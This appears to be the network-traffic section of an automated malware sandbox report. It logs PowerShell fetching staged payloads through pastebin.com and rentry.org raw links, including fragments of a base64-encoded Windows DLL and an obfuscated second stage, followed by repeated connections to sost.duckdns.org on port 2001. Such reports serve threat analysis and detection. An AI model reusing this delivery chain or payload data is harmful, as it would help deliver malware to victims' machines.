                                                                                              Oct 31, 2024 07:43:06.970402002 CET200150090181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:06.970887899 CET500902001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:06.974545956 CET500902001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:06.979440928 CET200150090181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:07.523381948 CET200150090181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:07.523449898 CET500902001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:07.523483992 CET500902001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:07.528368950 CET200150090181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:07.698532104 CET500912001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:07.703419924 CET200150091181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:07.703502893 CET500912001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:07.703876019 CET500912001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:07.708713055 CET200150091181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:08.263771057 CET200150091181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:08.263837099 CET500912001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:08.263922930 CET500912001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:08.269016981 CET200150091181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:08.432828903 CET500922001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:08.437752962 CET200150092181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:08.442234993 CET500922001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:08.442564964 CET500922001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:08.447561979 CET200150092181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:09.357506037 CET200150092181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:09.358289003 CET500922001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:09.358421087 CET500922001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:09.363198042 CET200150092181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:09.855631113 CET500932001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:09.860483885 CET200150093181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:09.860620975 CET500932001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:09.861259937 CET500932001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:09.866077900 CET200150093181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:10.413343906 CET200150093181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:43:10.414369106 CET500932001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:10.414422989 CET500932001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:43:10.419253111 CET200150093181.236.112.169192.168.2.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 31, 2024 07:41:04.958941936 CET5619853192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:04.965806007 CET53561981.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:10.160072088 CET5645453192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:10.251943111 CET53564541.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:18.201740980 CET5500853192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:18.209826946 CET53550081.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:41:21.912794113 CET5560153192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:41:22.021389961 CET53556011.1.1.1192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.135646105 CET6002553192.168.2.41.1.1.1
                                                                                              Oct 31, 2024 07:42:22.238631010 CET53600251.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 31, 2024 07:41:04.958941936 CET192.168.2.41.1.1.10xb4b4Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:10.160072088 CET192.168.2.41.1.1.10x571bStandard query (0)rentry.orgA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.201740980 CET192.168.2.41.1.1.10x5c8Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:21.912794113 CET192.168.2.41.1.1.10xbd75Standard query (0)sost.duckdns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:42:22.135646105 CET192.168.2.41.1.1.10xa916Standard query (0)sost.duckdns.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:04.965806007 CET1.1.1.1192.168.2.40xb4b4No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:10.251943111 CET1.1.1.1192.168.2.40x571bNo error (0)rentry.org164.132.58.105A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.209826946 CET1.1.1.1192.168.2.40x5c8No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:18.209826946 CET1.1.1.1192.168.2.40x5c8No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:41:22.021389961 CET1.1.1.1192.168.2.40xbd75No error (0)sost.duckdns.org181.236.112.169A (IP address)IN (0x0001)false
                                                                                              Oct 31, 2024 07:42:22.238631010 CET1.1.1.1192.168.2.40xa916No error (0)sost.duckdns.org181.236.112.169A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • pastebin.com
                                                                                              • rentry.org
                                                                                              • paste.ee

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449730104.20.3.235443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:05 UTC169OUTGET /raw/J6uRjZrv HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Host: pastebin.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:06 UTC391INHTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:06 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: EXPIRED
                                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:06 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a84b1aa14636-DFW
                                                                                              2024-10-31 06:41:06 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 76 73 6d 34 6f 66 78 73 2f 72 61 77 0d 0a
                                                                                              Data Ascii: 1fhttps://rentry.org/vsm4ofxs/raw
                                                                                              2024-10-31 06:41:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449731164.132.58.1054435480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:11 UTC167OUTGET /vsm4ofxs/raw HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                              Host: rentry.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:11 UTC319INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 31 Oct 2024 06:41:11 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 82604
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cache-Control: Vary
                                                                                              2024-10-31 06:41:11 UTC16065INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 50 79 66 49 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 49 69 41 4c 41 56 41 41 41 4f 6f 41 41 41 41 47 41 41 41 41 41 41 41 41 54 67 6b 42 41 41 41 67 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 67 41 41 41 41 41 67 41
                                                                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPyfIWcAAAAAAAAAAOAAIiALAVAAAOoAAAAGAAAAAAAATgkBAAAgAAAAAAAAAAAAEAAgAAAAAgA
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 47 39 38 41 41 41 4b 4b 67 4d 65 62 33 77 41 41 41 6f 71 41 78 38 73 62 33 77 41 41 41 6f 71 41 78 39 79 62 33 77 41 41 41 6f 71 41 78 39 30 62 33 77 41 41 41 6f 71 41 78 38 58 62 33 77 41 41 41 6f 71 41 78 38 4e 62 33 77 41 41 41 6f 71 41 78 38 4a 62 33 77 41 41 41 6f 71 41 78 74 76 66 41 41 41 43 69 6f 44 48 78 4e 76 66 41 41 41 43 69 6f 44 48 78 46 76 66 41 41 41 43 69 6f 44 48 78 5a 76 66 41 41 41 43 69 6f 44 49 4a 6f 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 42 76 66 41 41 41 43 69 6f 44 48 7a 68 76 66 41 41 41 43 69 6f 44 49 4e 59 41 41 41 42 76 66 41 41 41 43 69 6f 44 49 49 34 41 41 41 42 76 66 41 41 41 43 69 6f 44 48 32 6c 76 66 41 41 41 43 69 6f 44 49 50 34 41 41 41 42 76 66 41 41 41 43 67 4d 61 62 33 77 41 41 41 6f 71 41 78 38 74 62 33 77 41
                                                                                              Data Ascii: G98AAAKKgMeb3wAAAoqAx8sb3wAAAoqAx9yb3wAAAoqAx90b3wAAAoqAx8Xb3wAAAoqAx8Nb3wAAAoqAx8Jb3wAAAoqAxtvfAAACioDHxNvfAAACioDHxFvfAAACioDHxZvfAAACioDIJoAAABvfAAACioDH2BvfAAACioDHzhvfAAACioDINYAAABvfAAACioDII4AAABvfAAACioDH2lvfAAACioDIP4AAABvfAAACgMab3wAAAoqAx8tb3wA
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 41 51 43 49 41 45 42 41 41 42 5a 6c 46 51 71 45 7a 41 45 41 46 4d 41 41 41 41 2b 41 41 41 52 66 71 51 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 59 67 41 51 45 41 41 46 68 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 77 41 41 41 43 41 41 41 41 41 57 43 79 76 71 42 41 4a 2b 70 41 41 41 42 41 61 55 57 56 51 58 43 79 76 62 42 58 36 6c 41 41 41 45 42 70 52 55 47 41 73 72 7a 69 6f 41 45 7a 41 45 41 45 30 41 41 41 41 2b 41 41 41 52 66 71 59 41 41 41 51 43 4b 41 49 41 41 43 73 4b 42 68 59 76 42 51 5a 6d 46 31 6b 4b 41 77 5a 55 4b 78 49 48 52 51 4d 41 41 41 41 45 41 41 41 41 45 51 41 41 41 43 41 41 41 41 41 58 43 79 76 71 42 58 36 6e 41 41 41 45 42 70 52 55 47 41 73 72 33 51 51 43 66 71 59 41 41 41 51 47 6c 46 6c 55
                                                                                              Data Ascii: AQCIAEBAABZlFQqEzAEAFMAAAA+AAARfqQAAAQCKAIAACsKBhYvBQZmF1kKAwYgAQEAAFhUKxIHRQMAAAAEAAAAEwAAACAAAAAWCyvqBAJ+pAAABAaUWVQXCyvbBX6lAAAEBpRUGAsrzioAEzAEAE0AAAA+AAARfqYAAAQCKAIAACsKBhYvBQZmF1kKAwZUKxIHRQMAAAAEAAAAEQAAACAAAAAXCyvqBX6nAAAEBpRUGAsr3QQCfqYAAAQGlFlU
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 77 42 6f 41 41 41 42 45 41 43 54 44 67 41 41 65 41 42 5a 41 47 67 41 41 41 41 51 41 4b 67 4f 41 41 43 41 41 46 73 41 62 67 41 41 41 52 41 41 74 68 41 41 41 48 67 41 58 51 42 31 41 41 41 42 45 41 43 64 45 77 41 41 65 41 42 66 41 48 73 41 41 41 45 51 41 47 4d 55 41 41 42 34 41 46 38 41 66 77 43 41 41 42 41 41 66 68 51 41 41 49 41 41 58 77 43 44 41 41 41 41 45 41 43 54 46 41 41 41 67 41 42 67 41 49 73 41 41 41 41 51 41 4b 6f 55 41 41 43 55 41 47 45 41 6a 77 41 41 41 42 41 41 32 68 51 41 41 41 6b 41 5a 51 43 67 41 41 41 41 45 41 44 51 46 51 41 41 43 51 42 6d 41 4b 49 41 41 41 45 41 41 4f 55 56 41 41 44 56 41 47 30 41 6f 77 41 41 41 42 41 41 6e 67 45 41 41 4a 51 41 63 41 43 6a 41 41 41 41 45 41 44 48 41 51 41 41 43 51 42 30 41 4b 67 41 41 41 41 51 41 4f 59 42
                                                                                              Data Ascii: wBoAAABEACTDgAAeABZAGgAAAAQAKgOAACAAFsAbgAAARAAthAAAHgAXQB1AAABEACdEwAAeABfAHsAAAEQAGMUAAB4AF8AfwCAABAAfhQAAIAAXwCDAAAAEACTFAAAgABgAIsAAAAQAKoUAACUAGEAjwAAABAA2hQAAAkAZQCgAAAAEADQFQAACQBmAKIAAAEAAOUVAADVAG0AowAAABAAngEAAJQAcACjAAAAEADHAQAACQB0AKgAAAAQAOYB
                                                                                              2024-10-31 06:41:11 UTC16384INData Raw: 41 41 41 41 41 41 41 41 51 44 71 43 77 41 41 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4b 41 41 30 43 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 78 78 45 41 41 4c 67 41 41 41 41 43 41 41 41 41 58 67 45 41 41 41 55 41 42 41 41 47 41 41 51 41 44 77 41 4f 41 42 41 41 44 77 41 52 41 41 34 41 4c 77 41 75 41 44 4d 41 4d 67 41 30 41 44 49 41 4f 67 41 35 41 44 73 41 4f 51 41 38 41 44 6b 41 41 41 41 51 41 41 77 41 74 41 45 41 41 42 41 41 47 51 43 30 41 51 41 41 41 41 41 62 41 4c 51 42 48 51 41 72 41 65 38 42 32 41 37 78 41 53 38 50 41 41 41 41 54 47 52 6a 58 30 6b 30 58 7a 41 41 54 47 52 73 62 32 4e 66 4d 41 42 54 64 47 78 76 59 31 38 77 41 45 78 6b 59 58 4a 6e 58 7a 41 41 55 30 68 42 4d 51 42 4d 5a 47 4e 66 53 54 52 66 54 54 45 41 54 47 52 6a
                                                                                              Data Ascii: AAAAAAAAQDqCwAAAAAKAAAAAAAAAAAAAAAKAA0CAAAAAAAAAAABAAAAxxEAALgAAAACAAAAXgEAAAUABAAGAAQADwAOABAADwARAA4ALwAuADMAMgA0ADIAOgA5ADsAOQA8ADkAAAAQAAwAtAEAABAAGQC0AQAAAAAbALQBHQArAe8B2A7xAS8PAAAATGRjX0k0XzAATGRsb2NfMABTdGxvY18wAExkYXJnXzAAU0hBMQBMZGNfSTRfTTEATGRj
                                                                                              2024-10-31 06:41:11 UTC1003INData Raw: 51 41 41 41 46 51 41 5a 51 42 6f 41 48 55 41 62 41 42 6a 41 47 67 41 5a 51 42 7a 41 46 67 41 65 41 42 59 41 48 67 41 65 41 41 75 41 47 51 41 62 41 42 73 41 41 41 41 41 41 41 38 41 41 34 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 45 34 41 59 51 42 74 41 47 55 41 41 41 41 41 41 45 4d 41 62 41 42 68 41 48 4d 41 63 77 42 4d 41 47 6b 41 59 67 42 79 41 47 45 41 63 67 42 35 41 44 4d 41 41 41 41 30 41 41 67 41 41 51 42 51 41 48 49 41 62 77 42 6b 41 48 55 41 59 77 42 30 41 46 59 41 5a 51 42 79 41 48 4d 41 61 51 42 76 41 47 34 41 41 41 41 78 41 43 34 41 4d 41 41 75 41 44 41 41 4c 67 41 77 41 41 41 41 4f 41 41 49 41 41 45 41 51 51 42 7a 41 48 4d 41 5a 51 42 74 41 47 49 41 62 41 42 35 41 43 41 41 56 67 42 6c 41 48 49 41 63 77 42 70 41 47 38 41
                                                                                              Data Ascii: QAAAFQAZQBoAHUAbABjAGgAZQBzAFgAeABYAHgAeAAuAGQAbABsAAAAAAA8AA4AAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449732104.20.3.235443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:14 UTC74OUTGET /raw/4B83LcVU HTTP/1.1
                                                                                              Host: pastebin.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:15 UTC391INHTTP/1.1 200 OK
                                                                                              Date: Thu, 31 Oct 2024 06:41:15 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              x-frame-options: DENY
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1;mode=block
                                                                                              cache-control: public, max-age=1801
                                                                                              CF-Cache-Status: EXPIRED
                                                                                              Last-Modified: Thu, 31 Oct 2024 06:41:15 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8db1a884fa706b5b-DFW
                                                                                              2024-10-31 06:41:15 UTC37INData Raw: 31 66 0d 0a 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 6f 72 67 2f 73 68 71 6d 36 67 39 70 2f 72 61 77 0d 0a
                                                                                              Data Ascii: 1fhttps://rentry.org/shqm6g9p/raw
                                                                                              2024-10-31 06:41:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449733164.132.58.105443980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-31 06:41:16 UTC72OUTGET /shqm6g9p/raw HTTP/1.1
                                                                                              Host: rentry.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-31 06:41:16 UTC320INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 31 Oct 2024 06:41:16 GMT
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              Content-Length: 270652
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                              Cache-Control: Vary
                                                                                              2024-10-31 06:41:16 UTC16064INData Raw: 3d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: =
                                                                                              2024-10-31 06:41:16 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii:
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 93 94 51 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 43 e2 93 94 e2 93 94 e2 93 94 73 42 51 5a e2 93 94 e2 93 94 e2 93 94 49 47 e2 93 94 e2 93 94 e2 93 94 68 42 67 59 5a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 39 42 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 73 48 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4f e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 67 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 e2 93 94 e2 93 94 e2 93 94 55 47 e2 93 94 e2 93 94 e2 93 94 69 42 51 59 e2 93 94 e2 93 94 e2 93 94 49 57 47 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 77 53
                                                                                              Data Ascii: QZCsBQZIGhBgYZ9BMsHgOUGgbUGiBQYIWGIwS
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 62 43 51 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 5a 43 e2 93 94 e2 93 94 e2 93 94 36 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 77 35 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 58 43 67 35 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 77 34 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 56 43 67 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 54 43 51 34 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93
                                                                                              Data Ascii: bCQ6IZC6IXCw5EXCg5IVCw4EVCg4ITCQ4IRC
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: e2 93 94 61 e2 93 94 e2 93 94 e2 93 94 55 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 51 2f e2 93 94 e2 93 94 e2 93 94 51 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 4d e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 67 70 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 45 e2 93 94 e2 93 94 e2 93 94 7a e2 93 94 e2 93 94 e2 93 94 49 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: aUIQ/QIIMEzIEgpEEzI
                                                                                              2024-10-31 06:41:17 UTC16384INData Raw: 37 e2 93 94 e2 93 94 e2 93 94 78 62 55 51 4c e2 93 94 e2 93 94 e2 93 94 42 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 67 6a 55 46 51 4f 51 67 45 46 49 43 51 6b e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 30 49 35 42 63 44 45 53 52 52 65 e2 93 94 e2 93 94 e2 93 94 45 4a e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 4e 79 62 e2 93 94 e2 93 94 e2 93 94 31 e2 93 94 e2 93 94 e2 93 94 42 53 55 51 47 e2 93 94 e2 93 94 e2 93 94 52 43 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93 94 e2 93
                                                                                              Data Ascii: 7xbUQLBCgjUFQOQgEFICQk0I5BcDESRReEJNyb1BSUQGRC
